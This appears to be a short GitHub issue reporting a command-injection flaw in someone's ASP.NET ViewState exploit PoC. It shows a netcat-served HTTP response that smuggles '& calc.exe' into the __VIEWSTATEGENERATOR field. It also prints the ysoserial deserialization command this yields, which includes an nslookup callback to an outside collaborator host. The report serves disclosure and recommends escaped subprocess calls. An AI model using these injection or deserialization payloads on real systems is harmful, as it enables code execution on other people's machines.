Yo dawg #1
Description
I made a PoC for your PoC so I can pop shells while you pop shells:
echo '''HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: localhost
Cookie: ASP.NET_SessionId=test-sess-id Time
<html>id="__VIEWSTATEGENERATOR" value="& calc.exe"</html>
''' |sudo nc -l 80
Assuming you're running your PoC as python3 exploit.py -s http://localhost/ -u admin -p admin and blindly running that, the output command becomes:
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey=& calc.exe --generator="B97B4E27" --viewstateuserkey=test-sess-id --isdebug –islegacy
which pops calc. I know this is totally outside the scope of this little PoC but I just got a kick out of it. Python has some really nice utils for shelling out while also escaping params:
https://docs.python.org/3/library/subprocess.html#subprocess.run